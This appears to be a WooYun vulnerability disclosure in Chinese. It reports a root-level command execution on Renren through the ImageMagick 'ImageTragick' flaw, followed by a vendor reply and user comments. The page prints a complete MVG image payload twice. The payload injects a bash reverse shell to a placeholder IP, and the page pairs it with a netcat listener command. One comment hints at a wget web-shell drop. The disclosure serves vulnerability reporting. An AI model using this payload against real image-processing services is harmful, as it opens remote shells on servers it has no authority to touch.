当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205171

漏洞标题:人人网某漏洞导致直接Getshell影响主干网络直入内网

相关厂商:人人网

漏洞作者: f_f

提交时间:2016-05-05 10:53

修复时间:2016-06-20 21:30

公开时间:2016-06-20 21:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

详细说明:

ImageMagick 漏洞,远程代码执行,直接获取root shell 权限
ImageMagic 漏洞, 漏洞详情见https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/

1.png


构造POC exploit.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1 &")'
pop graphic-context
个人vps 上开启8080 端口监听
nc -l 8080
在人人网上传图片处上传exploit.png 图片,会提示图片上传失败,但是反弹shell 成功,见

屏幕快照 2016-05-05 上午2.58.20.png


直接拿到root shell

漏洞证明:

ImageMagic 漏洞, 漏洞详情见https://www.helpnetsecurity.com/2016/05/04/imagemagick-zero-day-flaw/
构造POC exploit.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xx.xx.xx.xx/8080 0>&1 &")'
pop graphic-context
个人vps 上开启8080 端口监听
nc -l 8080
在人人网上传图片处上传exploit.png 图片,会提示图片上传失败,但是反弹shell 成功,见

屏幕快照 2016-05-05 上午2.58.20.png


直接拿到root shell

修复方案:

修复方案见 https://imagetragick.com/

版权声明:转载请注明来源 f_f@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2016-05-06 21:22

厂商回复:

感谢

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-05 10:55 | 浩天 认证白帽子 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈!躁起来!)

    开始我没信,现在我信了

  2. 2016-05-05 10:56 | 白开水 ( 普通白帽子 | Rank:273 漏洞数:34 | 苍茫的天涯是我的爱~)

    沙发

  3. 2016-05-05 11:02 | Hex ( 实习白帽子 | Rank:33 漏洞数:14 | 安全圈小学生)

    666

  4. 2016-05-05 11:07 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:30 | 不会挖洞洞的猿猿不是好学生)

    开始我没信,现在我信了

  5. 2016-05-05 11:09 | 隔壁小王 ( 普通白帽子 | Rank:111 漏洞数:30 )

    开始我没信,现在我信了

  6. 2016-05-05 11:14 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    我信了

  7. 2016-05-05 11:20 | Brother ( 实习白帽子 | Rank:78 漏洞数:24 )

    开始我没信,现在我信了,咱也要观摩

  8. 2016-05-05 11:23 | 0h1in9e ( 实习白帽子 | Rank:58 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    6666666666666666

  9. 2016-05-05 11:29 | scanf ( 核心白帽子 | Rank:1672 漏洞数:236 | 。)

    我日

  10. 2016-05-05 11:33 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    命令执行

  11. 2016-05-05 11:37 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    @scanf 欧巴,我很好奇那个微博查询手机号和邮箱你怎么弄的,实在想不出来

  12. 2016-05-05 11:47 | automne ( 实习白帽子 | Rank:38 漏洞数:15 | 请多指教)

    仰望大神操作

  13. 2016-05-05 11:53 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:30 | 不会挖洞洞的猿猿不是好学生)

    @机器猫 你猜

  14. 2016-05-05 11:53 | 火焰真菌 ( 实习白帽子 | Rank:51 漏洞数:17 | 123)

    Wget -O xx.jsp

  15. 2016-05-05 11:58 | 巫妖王 ( 路人 | Rank:0 漏洞数:1 | 这个家伙很懒,居然什么都不写!)

    围观啊,不明觉厉

  16. 2016-05-05 12:01 | scanf ( 核心白帽子 | Rank:1672 漏洞数:236 | 。)

    @机器猫 内网某平台而已

  17. 2016-05-05 12:11 | her0ma 认证白帽子 ( 普通白帽子 | Rank:716 漏洞数:101 | 专注小厂商三十年!)

    人人网修复速度有点慢啊~

  18. 2016-05-05 12:27 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟,此号处于联盟托管中....)

    还有人玩人人网吗

  19. 2016-05-05 12:38 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    我是第100名关注人

  20. 2016-05-05 12:50 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    开始我没信,现在我信了,咱也要观摩

  21. 2016-05-05 13:06 | phith0n 认证白帽子 ( 普通白帽子 | Rank:834 漏洞数:127 | 一个想当文人的黑客~)

    imagemagic 命令执行的应用~

  22. 2016-05-05 13:44 | Whoamii ( 路人 | Rank:2 漏洞数:1 | 学习渗透方向,希望结识同道中人共同学习,...)

    此洞必火!

  23. 2016-05-05 13:51 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵!)

    imagemagic 命令执行的应用~

  24. 2016-05-05 14:22 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头,倒是那些空壳却昂着...)

    不上人人好久了

  25. 2016-05-05 14:24 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头,倒是那些空壳却昂着...)

    @浩天 漏洞审核怎么那么慢啊!?

  26. 2016-05-05 14:26 | cf_hb ( 普通白帽子 | Rank:119 漏洞数:17 | 爱生活,爱安全!)

    imagemagic 命令执行的应用~

  27. 2016-05-05 16:40 | 小小白帽 ( 实习白帽子 | Rank:61 漏洞数:18 | 致力于代码审计和漏洞挖掘)

    imagemagic 都已经用上了

  28. 2016-05-05 17:13 | sysALong ( 普通白帽子 | Rank:426 漏洞数:94 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    浩天欧巴都说话了,那就得关注 看看了。。。 没办法。

  29. 2016-05-05 17:34 | Code Life ( 普通白帽子 | Rank:202 漏洞数:45 | Code Life,Join It!)

    :-O 我信 我信 我信

  30. 2016-05-05 19:05 | MAX丶 ( 路人 | Rank:20 漏洞数:5 | 人生路上总有一些不顺心的事情,让我们跳过...)

    我去真迅速。。。

  31. 2016-05-05 19:40 | 0h1in9e ( 实习白帽子 | Rank:58 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    @浩天 麻烦看看哦!还有4个没审,都好几天了

  32. 2016-05-05 19:48 | 中国Cold ( 实习白帽子 | Rank:57 漏洞数:24 | 服重任,行远道,正直而固者,轴也。)

    开始我没信,现在我信了

  33. 2016-05-05 19:53 | 小牛牛 ( 普通白帽子 | Rank:139 漏洞数:17 | 求带)

    我反正是信了

  34. 2016-05-05 20:52 | 红颜小妖 ( 路人 | Rank:6 漏洞数:3 | 忙到停不下来)

    开始我没信,现在我信了

  35. 2016-05-05 20:52 | who_jeff ( 路人 | Rank:16 漏洞数:6 | )

    我信了 ,利用成功 ?

  36. 2016-05-05 21:01 | who_jeff ( 路人 | Rank:16 漏洞数:6 | )

    应该可以刷一波了,利用起来不难

  37. 2016-05-05 21:05 | 明月影 ( 路人 | Rank:12 漏洞数:8 )

    再次杀进内网

  38. 2016-05-05 21:19 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    为什么我测试的时候没成功呢?哪个屌大说下

  39. 2016-05-05 21:33 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)

    我宣布 这个洞火了

  40. 2016-05-05 21:47 | 淡蓝色の忧伤 ( 普通白帽子 | Rank:268 漏洞数:38 | 找个实习,有人要吗?(黑产勿扰))

    imagemagic 命令执行的应用~

  41. 2016-05-05 23:05 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    为表感谢,我们也申请了一台iPhone6S,请联系我们领取。

  42. 2016-05-05 23:46 | storysky ( 路人 | Rank:10 漏洞数:4 | 自由的风)

    等待公布

  43. 2016-05-07 12:17 | starry ( 路人 | Rank:4 漏洞数:1 | coder)

    为表感谢,我们申请了苹果6斤,请联系我们领取。

  44. 2016-05-07 20:17 | 王十三 ( 路人 | Rank:6 漏洞数:2 )

    小菜膜拜下

  45. 2016-05-26 21:36 | 幻老头儿 ( 普通白帽子 | Rank:285 漏洞数:62 | 新手上路。)

    拿到源码了么?